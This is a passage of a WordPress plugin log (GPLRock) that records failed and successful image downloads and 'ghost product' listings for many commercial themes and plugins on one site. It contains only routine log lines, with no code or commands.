tekhub-technology-ai-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:05 UTC] GPLRock: Image download failed for product tekhub-technology-ai-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tekhub---technology--ai-startup-wordpress-theme-20819.webp for product tekhub-technology-ai-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:04:07 UTC] GPLRock: Image download failed for product tekhub-technology-ai-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:09 UTC] GPLRock: Image download failed for product tekhub-technology-ai-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tekhub---technology--ai-startup-wordpress-theme-20819.webp for product tekhub-technology-ai-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:04:11 UTC] GPLRock WARNING: Image download failed for product tekhub-technology-ai-startup-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tekhub---technology--ai-startup-wordpress-theme-20819.webp [05-Apr-2026 16:04:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tekhub-technology-ai-startup-wordpress-theme [05-Apr-2026 16:04:11 UTC] GPLRock: Image download failed for product ecoland-single-property-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:14 UTC] GPLRock: Image download failed for product ecoland-single-property-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ecoland---single-property-wordpress-theme-23525.webp for product ecoland-single-property-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:04:16 UTC] GPLRock: Image download failed for product ecoland-single-property-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:18 UTC] GPLRock: Image download failed for product ecoland-single-property-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ecoland---single-property-wordpress-theme-23525.webp for product ecoland-single-property-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:04:20 UTC] GPLRock WARNING: Image download failed for product ecoland-single-property-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ecoland---single-property-wordpress-theme-23525.webp [05-Apr-2026 16:04:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ecoland-single-property-wordpress-theme [05-Apr-2026 16:04:21 UTC] GPLRock: Image download failed for product knowledge-base-helpdesk-wiki-faq-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:23 UTC] GPLRock: Image download failed for product knowledge-base-helpdesk-wiki-faq-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/knowledge-base--helpdesk--wiki--faq-wordpress-theme-21437.webp for product knowledge-base-helpdesk-wiki-faq-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:04:25 UTC] GPLRock: Image download failed for product knowledge-base-helpdesk-wiki-faq-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:27 UTC] GPLRock: Image download failed for product knowledge-base-helpdesk-wiki-faq-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/knowledge-base--helpdesk--wiki--faq-wordpress-theme-21437.webp for product knowledge-base-helpdesk-wiki-faq-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:04:29 UTC] GPLRock WARNING: Image download failed for product knowledge-base-helpdesk-wiki-faq-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/knowledge-base--helpdesk--wiki--faq-wordpress-theme-21437.webp [05-Apr-2026 16:04:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: knowledge-base-helpdesk-wiki-faq-wordpress-theme [05-Apr-2026 16:04:29 UTC] GPLRock: Image download failed for product corano-jewellery-theme-for-woocommerce-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:32 UTC] GPLRock: Image download failed for product corano-jewellery-theme-for-woocommerce-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/corano---jewellery-theme-for-woocommerce-wordpress-8228.webp for product corano-jewellery-theme-for-woocommerce-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:04:34 UTC] GPLRock: Image download failed for product corano-jewellery-theme-for-woocommerce-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:36 UTC] GPLRock: Image download failed for product corano-jewellery-theme-for-woocommerce-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/corano---jewellery-theme-for-woocommerce-wordpress-8228.webp for product corano-jewellery-theme-for-woocommerce-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:04:38 UTC] GPLRock WARNING: Image download failed for product corano-jewellery-theme-for-woocommerce-wordpress. URL: https://meldwp.com/wp-content/uploads/corano---jewellery-theme-for-woocommerce-wordpress-8228.webp [05-Apr-2026 16:04:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: corano-jewellery-theme-for-woocommerce-wordpress [05-Apr-2026 16:04:38 UTC] GPLRock: Image download failed for product soho-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:40 UTC] GPLRock: Image download failed for product soho-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/soho---photography-wordpress-theme-26368.webp for product soho-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:04:42 UTC] GPLRock: Image download failed for product soho-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:44 UTC] GPLRock: Image download failed for product soho-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/soho---photography-wordpress-theme-26368.webp for product soho-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:04:47 UTC] GPLRock WARNING: Image download failed for product soho-photography-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/soho---photography-wordpress-theme-26368.webp [05-Apr-2026 16:04:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: soho-photography-wordpress-theme [05-Apr-2026 16:04:47 UTC] GPLRock: Image download failed for product ramsay-personal-cvresume-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:49 UTC] GPLRock: Image download failed for product ramsay-personal-cvresume-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ramsay---personal-cvresume-wordpress-theme-728.webp for product ramsay-personal-cvresume-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:04:51 UTC] GPLRock: Image download failed for product ramsay-personal-cvresume-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:53 UTC] GPLRock: Image download failed for product ramsay-personal-cvresume-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ramsay---personal-cvresume-wordpress-theme-728.webp for product ramsay-personal-cvresume-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:04:55 UTC] GPLRock WARNING: Image download failed for product ramsay-personal-cvresume-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ramsay---personal-cvresume-wordpress-theme-728.webp [05-Apr-2026 16:04:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ramsay-personal-cvresume-wordpress-theme [05-Apr-2026 16:04:55 UTC] GPLRock: Image download failed for product sovy-restaurant-fse-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:04:58 UTC] GPLRock: Image download failed for product sovy-restaurant-fse-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:05:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sovy--restaurant-fse-wordpress-theme-32051.webp for product sovy-restaurant-fse-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:05:00 UTC] GPLRock: Image download failed for product sovy-restaurant-fse-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:05:02 UTC] GPLRock: Image download failed for product sovy-restaurant-fse-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:05:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sovy--restaurant-fse-wordpress-theme-32051.webp for product sovy-restaurant-fse-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:05:04 UTC] GPLRock WARNING: Image download failed for product sovy-restaurant-fse-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sovy--restaurant-fse-wordpress-theme-32051.webp [05-Apr-2026 16:05:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sovy-restaurant-fse-wordpress-theme [05-Apr-2026 16:05:04 UTC] GPLRock: Image download failed for product neon-bootstrap-admin-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:05:06 UTC] GPLRock: Image download failed for product neon-bootstrap-admin-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:05:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/neon---bootstrap-admin-theme-11425.webp for product neon-bootstrap-admin-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:05:08 UTC] GPLRock: Image download failed for product neon-bootstrap-admin-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:05:11 UTC] GPLRock: Image download failed for product neon-bootstrap-admin-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:05:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/neon---bootstrap-admin-theme-11425.webp for product neon-bootstrap-admin-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:05:13 UTC] GPLRock WARNING: Image download failed for product neon-bootstrap-admin-theme. URL: https://meldwp.com/wp-content/uploads/neon---bootstrap-admin-theme-11425.webp [05-Apr-2026 16:05:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: neon-bootstrap-admin-theme [05-Apr-2026 16:05:14 UTC] GPLRock: Image downloaded successfully for product woocommerce-pdf-invoices (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ff63d147.jpg [05-Apr-2026 16:05:14 UTC] GPLRock: Using pre-downloaded image for product woocommerce-pdf-invoices: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ff63d147.jpg [05-Apr-2026 16:05:14 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-pdf-invoices [05-Apr-2026 16:05:55 UTC] GPLRock: Image downloaded successfully for product mythemeshop-wp-review-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-360aae2b.jpg [05-Apr-2026 16:05:55 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-wp-review-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-360aae2b.jpg [05-Apr-2026 16:05:55 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-wp-review-pro [05-Apr-2026 16:05:57 UTC] GPLRock: Image downloaded successfully for product betube-video-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-56b39ecd.jpg [05-Apr-2026 16:05:57 UTC] GPLRock: Using pre-downloaded image for product betube-video-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-56b39ecd.jpg [05-Apr-2026 16:05:57 UTC] GPLRock: Ghost product published with image - Product ID: betube-video-wordpress-theme [05-Apr-2026 16:05:59 UTC] GPLRock: Image downloaded successfully for product give-pdf-receipts (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7569ee62.jpg [05-Apr-2026 16:05:59 UTC] GPLRock: Using pre-downloaded image for product give-pdf-receipts: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7569ee62.jpg [05-Apr-2026 16:05:59 UTC] GPLRock: Ghost product published with image - Product ID: give-pdf-receipts [05-Apr-2026 16:06:00 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-barcodes-and-qr-codes-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f7dec90a.jpg [05-Apr-2026 16:06:00 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-barcodes-and-qr-codes-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f7dec90a.jpg [05-Apr-2026 16:06:00 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-barcodes-and-qr-codes-premium [05-Apr-2026 16:06:02 UTC] GPLRock: Image downloaded successfully for product woocommerce-custom-product-designer (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2eb4f335.jpg [05-Apr-2026 16:06:02 UTC] GPLRock: Using pre-downloaded image for product woocommerce-custom-product-designer: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2eb4f335.jpg [05-Apr-2026 16:06:02 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-custom-product-designer [05-Apr-2026 16:06:04 UTC] GPLRock: Image downloaded successfully for product wpforms-zapier (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9d7e5e62.jpg [05-Apr-2026 16:06:04 UTC] GPLRock: Using pre-downloaded image for product wpforms-zapier: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9d7e5e62.jpg [05-Apr-2026 16:06:04 UTC] GPLRock: Ghost product published with image - Product ID: wpforms-zapier [05-Apr-2026 16:06:05 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-pricing-tables (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-df69fc97.jpg [05-Apr-2026 16:06:05 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-pricing-tables: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-df69fc97.jpg [05-Apr-2026 16:06:05 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-pricing-tables [05-Apr-2026 16:06:07 UTC] GPLRock: Image downloaded successfully for product mr-seo-seo-marketing-agency-and-social-media-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e1bd24c9.jpg [05-Apr-2026 16:06:07 UTC] GPLRock: Using pre-downloaded image for product mr-seo-seo-marketing-agency-and-social-media-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e1bd24c9.jpg [05-Apr-2026 16:06:07 UTC] GPLRock: Ghost product published with image - Product ID: mr-seo-seo-marketing-agency-and-social-media-theme [05-Apr-2026 16:06:09 UTC] GPLRock: Image downloaded successfully for product veda-multi-purpose-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5652a074.jpg [05-Apr-2026 16:06:09 UTC] GPLRock: Using pre-downloaded image for product veda-multi-purpose-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5652a074.jpg [05-Apr-2026 16:06:09 UTC] GPLRock: Ghost product published with image - Product ID: veda-multi-purpose-theme [05-Apr-2026 16:06:10 UTC] GPLRock: Image downloaded successfully for product wpforms-geolocation (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-69e16503.jpg [05-Apr-2026 16:06:10 UTC] GPLRock: Using pre-downloaded image for product wpforms-geolocation: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-69e16503.jpg [05-Apr-2026 16:06:10 UTC] GPLRock: Ghost product published with image - Product ID: wpforms-geolocation [05-Apr-2026 16:07:55 UTC] GPLRock: Image downloaded successfully for product brandmode-digital-marketing-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c2e9257a.webp [05-Apr-2026 16:07:55 UTC] GPLRock: Using pre-downloaded image for product brandmode-digital-marketing-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c2e9257a.webp [05-Apr-2026 16:07:55 UTC] GPLRock: Ghost product published with image - Product ID: brandmode-digital-marketing-agency-elementor-template-kit [05-Apr-2026 16:07:57 UTC] GPLRock: Image downloaded successfully for product merto-multipurpose-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9b7be568.jpg [05-Apr-2026 16:07:57 UTC] GPLRock: Using pre-downloaded image for product merto-multipurpose-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9b7be568.jpg [05-Apr-2026 16:07:57 UTC] GPLRock: Ghost product published with image - Product ID: merto-multipurpose-woocommerce-wordpress-theme [05-Apr-2026 16:07:59 UTC] GPLRock: Image downloaded successfully for product piotnet-addons-for-elementor-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fe8951fa.jpg [05-Apr-2026 16:07:59 UTC] GPLRock: Using pre-downloaded image for product piotnet-addons-for-elementor-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fe8951fa.jpg [05-Apr-2026 16:07:59 UTC] GPLRock: Ghost product published with image - Product ID: piotnet-addons-for-elementor-pro [05-Apr-2026 16:08:01 UTC] GPLRock: Image downloaded successfully for product wpforms-user-registration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-49d061fe.jpg [05-Apr-2026 16:08:01 UTC] GPLRock: Using pre-downloaded image for product wpforms-user-registration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-49d061fe.jpg [05-Apr-2026 16:08:01 UTC] GPLRock: Ghost product published with image - Product ID: wpforms-user-registration [05-Apr-2026 16:08:02 UTC] GPLRock: Image downloaded successfully for product affiliatewp-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b0ccc1e0.jpg [05-Apr-2026 16:08:02 UTC] GPLRock: Using pre-downloaded image for product affiliatewp-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b0ccc1e0.jpg [05-Apr-2026 16:08:02 UTC] GPLRock: Ghost product published with image - Product ID: affiliatewp-wordpress-plugin [05-Apr-2026 16:08:04 UTC] GPLRock: Image downloaded successfully for product learndash-easy-digital-downloads-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1db60ea9.jpg [05-Apr-2026 16:08:04 UTC] GPLRock: Using pre-downloaded image for product learndash-easy-digital-downloads-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1db60ea9.jpg [05-Apr-2026 16:08:04 UTC] GPLRock: Ghost product published with image - Product ID: learndash-easy-digital-downloads-integration [05-Apr-2026 16:08:06 UTC] GPLRock: Image downloaded successfully for product dentalia-dentist-medical-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ec772186.jpg [05-Apr-2026 16:08:06 UTC] GPLRock: Using pre-downloaded image for product dentalia-dentist-medical-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ec772186.jpg [05-Apr-2026 16:08:06 UTC] GPLRock: Ghost product published with image - Product ID: dentalia-dentist-medical-wordpress-theme [05-Apr-2026 16:18:33 UTC] GPLRock: Image download failed for product midare-senior-care-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:18:35 UTC] GPLRock: Image download failed for product midare-senior-care-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:18:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/midare---senior-care--medical-wordpress-theme-2952.webp for product midare-senior-care-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:18:37 UTC] GPLRock: Image download failed for product midare-senior-care-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:18:39 UTC] GPLRock: Image download failed for product midare-senior-care-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:18:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/midare---senior-care--medical-wordpress-theme-2952.webp for product midare-senior-care-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:18:41 UTC] GPLRock WARNING: Image download failed for product midare-senior-care-medical-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/midare---senior-care--medical-wordpress-theme-2952.webp [05-Apr-2026 16:18:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: midare-senior-care-medical-wordpress-theme [05-Apr-2026 16:18:41 UTC] GPLRock: Image download failed for product emporium-angular-20-material-design-ecommerce-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:18:43 UTC] GPLRock: Image download failed for product emporium-angular-20-material-design-ecommerce-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:18:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/emporium---angular-20-material-design-ecommerce-template-812.webp for product emporium-angular-20-material-design-ecommerce-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:18:46 UTC] GPLRock: Image download failed for product emporium-angular-20-material-design-ecommerce-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:18:48 UTC] GPLRock: Image download failed for product emporium-angular-20-material-design-ecommerce-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:18:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/emporium---angular-20-material-design-ecommerce-template-812.webp for product emporium-angular-20-material-design-ecommerce-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:18:50 UTC] GPLRock WARNING: Image download failed for product emporium-angular-20-material-design-ecommerce-template. URL: https://meldwp.com/wp-content/uploads/emporium---angular-20-material-design-ecommerce-template-812.webp [05-Apr-2026 16:18:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: emporium-angular-20-material-design-ecommerce-template [05-Apr-2026 16:18:50 UTC] GPLRock: Image downloaded successfully for product transfers-transport-and-car-hire-html-template (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-44631087.webp [05-Apr-2026 16:18:50 UTC] GPLRock: Using pre-downloaded image for product transfers-transport-and-car-hire-html-template: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-44631087.webp [05-Apr-2026 16:18:50 UTC] GPLRock: Ghost product published with image - Product ID: transfers-transport-and-car-hire-html-template [05-Apr-2026 16:18:50 UTC] GPLRock: Image download failed for product zoomy-lightweight-lms-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:18:52 UTC] GPLRock: Image download failed for product zoomy-lightweight-lms-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:18:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zoomy---lightweight-lms--education-wordpress-theme-26504.webp for product zoomy-lightweight-lms-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:18:54 UTC] GPLRock: Image download failed for product zoomy-lightweight-lms-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:18:57 UTC] GPLRock: Image download failed for product zoomy-lightweight-lms-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:18:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zoomy---lightweight-lms--education-wordpress-theme-26504.webp for product zoomy-lightweight-lms-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:18:59 UTC] GPLRock WARNING: Image download failed for product zoomy-lightweight-lms-education-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/zoomy---lightweight-lms--education-wordpress-theme-26504.webp [05-Apr-2026 16:18:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zoomy-lightweight-lms-education-wordpress-theme [05-Apr-2026 16:18:59 UTC] GPLRock: Image download failed for product hooray-blog-wordpress-theme-for-professional-writers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:19:01 UTC] GPLRock: Image download failed for product hooray-blog-wordpress-theme-for-professional-writers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:19:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hooray--blog-wordpress-theme-for-professional-writers-32751.webp for product hooray-blog-wordpress-theme-for-professional-writers after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:19:03 UTC] GPLRock: Image download failed for product hooray-blog-wordpress-theme-for-professional-writers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:19:05 UTC] GPLRock: Image download failed for product hooray-blog-wordpress-theme-for-professional-writers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:19:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hooray--blog-wordpress-theme-for-professional-writers-32751.webp for product hooray-blog-wordpress-theme-for-professional-writers after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:19:07 UTC] GPLRock WARNING: Image download failed for product hooray-blog-wordpress-theme-for-professional-writers. URL: https://meldwp.com/wp-content/uploads/hooray--blog-wordpress-theme-for-professional-writers-32751.webp [05-Apr-2026 16:19:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hooray-blog-wordpress-theme-for-professional-writers [05-Apr-2026 16:19:07 UTC] GPLRock: Image download failed for product bizkar-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:19:09 UTC] GPLRock: Image download failed for product bizkar-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:19:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bizkar---creative-agency-wordpress-theme-1130.webp for product bizkar-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:19:12 UTC] GPLRock: Image download failed for product bizkar-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:19:14 UTC] GPLRock: Image download failed for product bizkar-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:19:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bizkar---creative-agency-wordpress-theme-1130.webp for product bizkar-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 16:19:16 UTC] GPLRock WARNING: Image download failed for product bizkar-creative-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bizkar---creative-agency-wordpress-theme-1130.webp [05-Apr-2026 16:19:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bizkar-creative-agency-wordpress-theme [05-Apr-2026 16:19:16 UTC] GPLRock: Image download failed for product silver-care-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:19:18 UTC] GPLRock: Image download failed for product silver-care-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 16:19:20 UTC] 